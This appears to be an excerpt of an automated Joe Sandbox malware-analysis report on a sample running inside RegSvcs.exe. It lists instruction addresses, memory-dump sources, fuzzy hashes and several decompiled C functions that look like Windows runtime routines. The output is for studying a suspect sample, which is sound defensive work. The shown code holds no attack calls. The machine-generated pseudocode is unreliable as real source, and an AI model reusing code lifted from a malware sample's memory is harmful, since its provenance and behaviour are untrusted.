                                          0x013b1108
                                          0x013b110c
                                          0x013b111d
                                          0x013b110e
                                          0x013b110e
                                          0x013b1110
                                          0x013b1113
                                          0x013b1115
                                          0x013b1115
                                          0x013b1115
                                          0x013b1118
                                          0x013b1118
                                          0x013b1126
                                          0x013b113a
                                          0x013b113d
                                          0x013b113f
                                          0x00000000
                                          0x013b1141
                                          0x013b1141
                                          0x00000000
                                          0x013b1141
                                          0x013b113f
                                          0x013b10d6
                                          0x013b10d9
                                          0x013b10dd
                                          0x013b10e3
                                          0x013b10e6
                                          0x013b10e9
                                          0x00000000
                                          0x00000000
                                          0x013b10ee
                                          0x013b10f0
                                          0x013b10f2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b10f2
                                          0x00000000
                                          0x013b1099
                                          0x013b1099
                                          0x013b109c
                                          0x013b109c
                                          0x013b109e
                                          0x013b10a0
                                          0x013b10b3
                                          0x013b10a2
                                          0x013b10a2
                                          0x013b10a4
                                          0x013b10a7
                                          0x013b10a9
                                          0x013b10ab
                                          0x013b10ab
                                          0x013b10ab
                                          0x013b10ae
                                          0x013b10ae
                                          0x013b10b6
                                          0x013b10b9
                                          0x00000000
                                          0x00000000
                                          0x013b10be
                                          0x013b10c1
                                          0x013b10c3
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b10c3
                                          0x013b10c5
                                          0x00000000
                                          0x013b10c5
                                          0x013b1097
                                          0x013b1050
                                          0x013b1053
                                          0x013b1056
                                          0x013b1059
                                          0x013b105c
                                          0x013b105e
                                          0x013b1060
                                          0x013b1062
                                          0x013b1064
                                          0x013b1064
                                          0x013b1062
                                          0x013b1066
                                          0x013b1069
                                          0x013b106b
                                          0x013b106d
                                          0x013b106f
                                          0x013b1076
                                          0x013b1076
                                          0x013b1076
                                          0x00000000
                                          0x013b1076
                                          0x013b1071
                                          0x013b1074
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b1074
                                          0x013b1079
                                          0x013b1079
                                          0x013b107b
                                          0x013b107b
                                          0x013b107f
                                          0x013b1082
                                          0x013b1085
                                          0x00000000
                                          0x013b1085
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ad0deb4db30b6afc970420fdf94b09ce45b1a0ffe221f60b3260279cadc39faa
                                          • Instruction ID: 36a903e50aef96baa935a3ccf2b5f3cd09c705e5c2a9a015ddc1d8b3599a2446
                                          • Opcode Fuzzy Hash: ad0deb4db30b6afc970420fdf94b09ce45b1a0ffe221f60b3260279cadc39faa
                                          • Instruction Fuzzy Hash: FD719238B00765CBDB24CF59E4E06BAB7F5FB44308B24446EDA928BA40E771E950CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0139CB4F Relevance: .2, Instructions: 171COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 86%
                                          			E0139CB4F(signed int __ecx) {
				signed int _v8;
				unsigned int* _v12;
				intOrPtr* _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				signed int _t57;
				signed int _t61;
				signed int _t63;
				intOrPtr* _t79;
				unsigned int* _t80;
				signed int _t82;
				signed int* _t84;
				signed char _t88;
				signed char _t93;
				signed int _t100;
				signed int _t103;
				signed short _t104;
				unsigned int _t107;
				unsigned int _t111;
				signed int _t114;
				signed short* _t115;
				void* _t118;
				signed short* _t119;
				signed int _t120;

				_t120 = __ecx;
				_v12 = 0;
				_t118 = __ecx + 0xc0;
				_t79 =  *((intOrPtr*)(_t118 + 4));
				if(_t118 == _t79) {
					_t80 = 0;
					L38:
					return _t80;
				} else {
					goto L1;
				}
				do {
					L1:
					_t119 = _t79 - 8;
					_v16 = _t79;
					if( *(_t120 + 0x4c) != 0) {
						_t107 =  *(_t120 + 0x50) ^  *_t119;
						 *_t119 = _t107;
						_t88 = _t107 >> 0x00000010 ^ _t107 >> 0x00000008 ^ _t107;
						_t123 = _t107 >> 0x18 - _t88;
						if(_t107 >> 0x18 != _t88) {
							E013AFA2B(_t79, _t120, _t119, _t119, _t120, _t123, _t88);
						}
					}
					_t82 =  *_t119 & 0x0000ffff;
					_t79 =  *_t79;
					_v20 = _t82;
					_v8 = _t82;
					if((_t119[1] & 0x00000008) == 0) {
						_t84 = E013199BF(_t120, _t119,  &_v8, 1);
						__eflags = _v8 - _v20;
						if(_v8 == _v20) {
							_t103 = _v12;
							__eflags = _t103;
							if(_t103 == 0) {
								L29:
								_v12 = _t84;
								L30:
								__eflags =  *(_t120 + 0x4c);
								if(__eflags != 0) {
									_t84[0] = _t84[0] ^ _t84[0] ^  *_t84;
									 *_t84 =  *_t84 ^  *(_t120 + 0x50);
									__eflags =  *_t84;
								}
								goto L32;
							}
							__eflags =  *_t103 -  *_t84;
							if( *_t103 >=  *_t84) {
								goto L30;
							}
							goto L29;
						}
						__eflags = _t84 - _t119;
						if(_t84 == _t119) {
							L24:
							_push(1);
							_push(_v8);
							_t115 = _t84;
							L25:
							E0131A309(_t120, _t115);
							L26:
							_t79 =  *((intOrPtr*)(_t120 + 0xc4));
							goto L32;
						}
						__eflags =  *_t84 - 0x200;
						if( *_t84 < 0x200) {
							L23:
							E0131A830(_t120, _t84, _v8);
							goto L26;
						}
						__eflags =  *((intOrPtr*)(_t120 + 0x54)) - _t84[1];
						if( *((intOrPtr*)(_t120 + 0x54)) == _t84[1]) {
							goto L24;
						}
						goto L23;
					}
					_t104 = _t119[6];
					_t55 =  *(_t79 + 4);
					_v8 = _t104;
					if( *_t104 != _t55) {
						L18:
						_push(_t82);
						_push( *_t104);
						E013BA80D(_t120, 0xd, _v16, _t55);
						goto L26;
					}
					_t82 = _v20;
					if( *_t104 != _v16) {
						goto L18;
					}
					 *((intOrPtr*)(_t120 + 0x74)) =  *((intOrPtr*)(_t120 + 0x74)) - _t82;
					_t114 =  *(_t120 + 0xb4);
					if(_t114 == 0) {
						L14:
						_t57 = _v8;
						 *_t57 = _t79;
						 *(_t79 + 4) = _t57;
						if((_t119[1] & 0x00000008) != 0) {
							E0131A229(_t120, _t119);
						}
						_t115 = _t119;
						_push(1);
						_push( *_t119 & 0x0000ffff);
						goto L25;
					}
					_t100 =  *_t119 & 0x0000ffff;
					while(_t100 >=  *((intOrPtr*)(_t114 + 4))) {
						_t61 =  *_t114;
						__eflags = _t61;
						if(_t61 == 0) {
							_t63 =  *((intOrPtr*)(_t114 + 4)) - 1;
							L13:
							E0131BC04(_t120, _t114, 1, _v16, _t63, _t100);
							goto L14;
						}
						_t114 = _t61;
					}
					_t63 = _t100;
					goto L13;
					L32:
				} while (_t120 + 0xc0 != _t79);
				_t80 = _v12;
				if(_t80 != 0 &&  *(_t120 + 0x4c) != 0) {
					_t111 =  *(_t120 + 0x50) ^  *_t80;
					 *_t80 = _t111;
					_t93 = _t111 >> 0x00000010 ^ _t111 >> 0x00000008 ^ _t111;
					_t133 = _t111 >> 0x18 - _t93;
					if(_t111 >> 0x18 != _t93) {
						E013AFA2B(_t80, _t120, _t80, _t119, _t120, _t133, _t93);
					}
				}
				goto L38;
			}































                                          0x0139cb59
                                          0x0139cb5e
                                          0x0139cb61
                                          0x0139cb67
                                          0x0139cb6c
                                          0x0139ccf9
                                          0x0139ccfd
                                          0x0139cd03
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0139cb72
                                          0x0139cb72
                                          0x0139cb76
                                          0x0139cb79
                                          0x0139cb7c
                                          0x0139cb81
                                          0x0139cb85
                                          0x0139cb91
                                          0x0139cb96
                                          0x0139cb98
                                          0x0139cb9f
                                          0x0139cb9f
                                          0x0139cb98
                                          0x0139cba8
                                          0x0139cbab
                                          0x0139cbad
                                          0x0139cbb0
                                          0x0139cbb3
                                          0x0139cc48
                                          0x0139cc4d
                                          0x0139cc50
                                          0x0139cc8e
                                          0x0139cc91
                                          0x0139cc93
                                          0x0139cc9d
                                          0x0139cc9d
                                          0x0139cca0
                                          0x0139cca0
                                          0x0139cca4
                                          0x0139ccae
                                          0x0139ccb4
                                          0x0139ccb4
                                          0x0139ccb4
                                          0x00000000
                                          0x0139cca4
                                          0x0139cc98
                                          0x0139cc9b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0139cc9b
                                          0x0139cc52
                                          0x0139cc54
                                          0x0139cc78
                                          0x0139cc78
                                          0x0139cc7a
                                          0x0139cc7d
                                          0x0139cc7f
                                          0x0139cc81
                                          0x0139cc86
                                          0x0139cc86
                                          0x00000000
                                          0x0139cc86
                                          0x0139cc5b
                                          0x0139cc5e
                                          0x0139cc6a
                                          0x0139cc71
                                          0x00000000
                                          0x0139cc71
                                          0x0139cc64
                                          0x0139cc68
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0139cc68
                                          0x0139cbb9
                                          0x0139cbbc
                                          0x0139cbbf
                                          0x0139cbc4
                                          0x0139cc26
                                          0x0139cc26
                                          0x0139cc27
                                          0x0139cc32
                                          0x00000000
                                          0x0139cc32
                                          0x0139cbcb
                                          0x0139cbce
                                          0x00000000
                                          0x00000000
                                          0x0139cbd0
                                          0x0139cbd3
                                          0x0139cbdb
                                          0x0139cbff
                                          0x0139cbff
                                          0x0139cc02
                                          0x0139cc04
                                          0x0139cc0b
                                          0x0139cc11
                                          0x0139cc11
                                          0x0139cc19
                                          0x0139cc1b
                                          0x0139cc1d
                                          0x00000000
                                          0x0139cc1d
                                          0x0139cbdd
                                          0x0139cbea
                                          0x0139cbe2
                                          0x0139cbe4
                                          0x0139cbe6
                                          0x0139cc23
                                          0x0139cbf1
                                          0x0139cbfa
                                          0x00000000
                                          0x0139cbfa
                                          0x0139cbe8
                                          0x0139cbe8
                                          0x0139cbef
                                          0x00000000
                                          0x0139ccb6
                                          0x0139ccbc
                                          0x0139ccc4
                                          0x0139ccc9
                                          0x0139ccd4
                                          0x0139ccd8
                                          0x0139cce4
                                          0x0139cce9
                                          0x0139cceb
                                          0x0139ccf2
                                          0x0139ccf2
                                          0x0139cceb
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
                                          • Instruction ID: ead97d18cf6224e3d8bacc57e7d4792518e20256739cd80f737388327ee9b3ad
                                          • Opcode Fuzzy Hash: 27c37b6d7e0c2081b6e3e83f285a8b191e63be0dc1735e869adf4b3fb904fb2e
                                          • Instruction Fuzzy Hash: 9F51CF747006469BDF28DF6DC490AAABFF6FF88308F249159E6469B344D7319942CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0042257F Relevance: .2, Instructions: 169COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1226a19f224ef168117c5ca08158f85d87f6776d01823543280e6fcac97d814
                                          • Instruction ID: c5490bc0ddc3751356c44c9e9544f62e894d3fc8fa0183f8edde54cdeeaccb7c
                                          • Opcode Fuzzy Hash: a1226a19f224ef168117c5ca08158f85d87f6776d01823543280e6fcac97d814
                                          • Instruction Fuzzy Hash: 428104329493C1DFDB02DF78E896B463FB1F756320748068EC8A14B1D2D77520A6DB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004044C7 Relevance: .2, Instructions: 165COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_401000_RegSvcs.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                          • Instruction ID: 19fdd23cc24b83e8c90001725f3d3d945805d05bc24b89184d3bb120e8257abd
                                          • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                          • Instruction Fuzzy Hash: AB5171B3E14A254BD3188E09CC40631B792EFD8312B5B81BADD199B397CA74E9529A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F52A5 Relevance: .2, Instructions: 161COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E012F52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0130EEF0(0x13e79a0);
					_t104 =  *0x13e8210; // 0xe91d60
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0130EB70(_t93, 0x13e79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01339890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0130EEF0(0x13e79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0130EB70(0, 0x13e79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xe91d6d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0132F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0130EEF0(0x13e79a0);
									__eflags =  *0x13e8210 - _t104; // 0xe91d60
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x13e8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01374888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0130EB70(_t95, 0x13e79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013395D0();
											L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E013395D0();
											L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0130EB70(_t93, 0x13e79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E013395D0();
										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E013395D0();
										L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0132F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                          0x012f52a5
                                          0x012f52ad
                                          0x012f52b0
                                          0x012f52b3
                                          0x012f52b7
                                          0x012f52ba
                                          0x012f52bf
                                          0x012f52c4
                                          0x012f52cc
                                          0x00000000
                                          0x00000000
                                          0x012f52ce
                                          0x012f52d9
                                          0x012f52dd
                                          0x012f52e7
                                          0x012f52f7
                                          0x012f52f9
                                          0x012f52fd
                                          0x01350dcf
                                          0x01350dd5
                                          0x01350dd6
                                          0x01350dd7
                                          0x01350dd8
                                          0x01350dd9
                                          0x01350dde
                                          0x01350ddf
                                          0x01350de0
                                          0x01350de1
                                          0x01350de2
                                          0x01350de5
                                          0x01350dea
                                          0x01350dec
                                          0x01350f60
                                          0x01350f64
                                          0x01350f70
                                          0x01350f76
                                          0x01350f79
                                          0x01350f79
                                          0x00000000
                                          0x01350f64
                                          0x01350df2
                                          0x01350df7
                                          0x01350e04
                                          0x01350e0d
                                          0x01350e0d
                                          0x01350e10
                                          0x01350e1a
                                          0x01350e1c
                                          0x01350e4c
                                          0x01350e52
                                          0x01350e61
                                          0x01350e67
                                          0x01350e6b
                                          0x01350e70
                                          0x01350e76
                                          0x01350ed7
                                          0x01350edc
                                          0x01350ee0
                                          0x01350ee6
                                          0x01350eea
                                          0x01350eed
                                          0x01350ef0
                                          0x01350ef3
                                          0x01350ef6
                                          0x01350ef9
                                          0x01350efe
                                          0x01350f01
                                          0x01350f01
                                          0x01350f0b
                                          0x01350f12
                                          0x01350f16
                                          0x01350f18
                                          0x01350f1b
                                          0x01350f2c
                                          0x01350f31
                                          0x01350f31
                                          0x01350f35
                                          0x01350f39
                                          0x01350f3a
                                          0x01350f3c
                                          0x01350f3f
                                          0x01350f50
                                          0x01350f55
                                          0x01350f55
                                          0x01350f59
                                          0x012f52eb
                                          0x012f52f1
                                          0x012f52f1
                                          0x01350e7d
                                          0x01350e84
                                          0x01350e88
                                          0x01350e8a
                                          0x01350e8d
                                          0x01350e9e
                                          0x01350ea3
                                          0x01350ea3
                                          0x01350ea7
                                          0x01350eaf
                                          0x01350eb3
                                          0x01350eb9
                                          0x01350eb9
                                          0x01350ebc
                                          0x01350ecd
                                          0x01350ecd
                                          0x00000000
                                          0x01350eb3
                                          0x01350e21
                                          0x01350e2b
                                          0x01350e2f
                                          0x01350e30
                                          0x01350e3a
                                          0x01350e3f
                                          0x01350e41
                                          0x00000000
                                          0x00000000
                                          0x01350e47
                                          0x00000000
                                          0x01350e47
                                          0x01350df9
                                          0x01350dfe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01350dfe
                                          0x012f5303
                                          0x012f5307
                                          0x00000000
                                          0x012f5309
                                          0x00000000
                                          0x012f5309
                                          0x012f5307
                                          0x012f52e9
                                          0x012f52e9
                                          0x00000000
                                          0x012f52e9
                                          0x012f530e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ecc4f94d03686cf06b9de7943a13d5672cf1a3b95a9c899f75a3cabe99b3b30
                                          • Instruction ID: 0a9e87f73ec208b180866c9d777f296dbcc55c2f3a97a6a84a39fbc9c9d7ffaf
                                          • Opcode Fuzzy Hash: 7ecc4f94d03686cf06b9de7943a13d5672cf1a3b95a9c899f75a3cabe99b3b30
                                          • Instruction Fuzzy Hash: 2051CF71205742EBD322EF68C845B2BBBE4FF90B18F14092EF99587691E771E844C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01322AE4 Relevance: .2, Instructions: 159COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01322AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x13e8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x13e8208; // 0x13e8207
				_t8 = _t57 + 0x13e8208; // 0x13e8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x13e8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x13e821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x13e6d5c; // 0x7fc70654
							_t72 =  *0x13e6d5c; // 0x7fc70654
							_t75 =  *0x13e6d5c; // 0x7fc70654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x13e6d5c; // 0x7fc70654
							_t84 =  *0x13e6d5c; // 0x7fc70654
							_t87 =  *0x13e6d5c; // 0x7fc70654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0133F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                          0x01322ae4
                                          0x01322aec
                                          0x01322aef
                                          0x01322af4
                                          0x01322af7
                                          0x01322afd
                                          0x01322b92
                                          0x01322b92
                                          0x01322b97
                                          0x01322b9c
                                          0x01322b9c
                                          0x01322b03
                                          0x01322b06
                                          0x01322b09
                                          0x01322b09
                                          0x01322b0f
                                          0x01322b15
                                          0x01322b15
                                          0x01322b1b
                                          0x01322b1e
                                          0x01322b21
                                          0x01322b26
                                          0x01322b29
                                          0x01322b81
                                          0x01322b84
                                          0x01322c0e
                                          0x01322c15
                                          0x01322c24
                                          0x01322c24
                                          0x01322b8a
                                          0x01322b8a
                                          0x01322b8a
                                          0x01322b8a
                                          0x01322b90
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01322b4a
                                          0x01322b4a
                                          0x01322b4d
                                          0x01322b53
                                          0x00000000
                                          0x00000000
                                          0x01322b55
                                          0x01322b58
                                          0x01322bb7
                                          0x01365d1b
                                          0x01365d37
                                          0x01365d47
                                          0x01365d53
                                          0x01322bbd
                                          0x01322bbd
                                          0x01322bbd
                                          0x01322bb7
                                          0x01322b5d
                                          0x01322c2f
                                          0x01365d5b
                                          0x01365d77
                                          0x01365d87
                                          0x01365d93
                                          0x01322c35
                                          0x01322c35
                                          0x01322c35
                                          0x01322c2f
                                          0x01322b65
                                          0x01322b9f
                                          0x01322ba2
                                          0x01322b67
                                          0x01322b67
                                          0x01322b69
                                          0x01322b6b
                                          0x01322b6e
                                          0x01322bc9
                                          0x01322bcc
                                          0x01322bcf
                                          0x01322bd4
                                          0x01322bd6
                                          0x01322bd6
                                          0x01322bdb
                                          0x01322c02
                                          0x01322c05
                                          0x01322c07
                                          0x00000000
                                          0x01322c07
                                          0x01322be0
                                          0x01322c00
                                          0x01322c3f
                                          0x01322c3f
                                          0x00000000
                                          0x01322c00
                                          0x01322be5
                                          0x01322be7
                                          0x01322bec
                                          0x01322bf4
                                          0x01322bf6
                                          0x00000000
                                          0x01322bf6
                                          0x01322b70
                                          0x01322b76
                                          0x01322b2b
                                          0x01322b2b
                                          0x01322b2d
                                          0x01322b2f
                                          0x01322b32
                                          0x01322b35
                                          0x01322b3a
                                          0x00000000
                                          0x01322b40
                                          0x01322b43
                                          0x01322b45
                                          0x01322b47
                                          0x01322b4a
                                          0x01322b4d
                                          0x01322b53
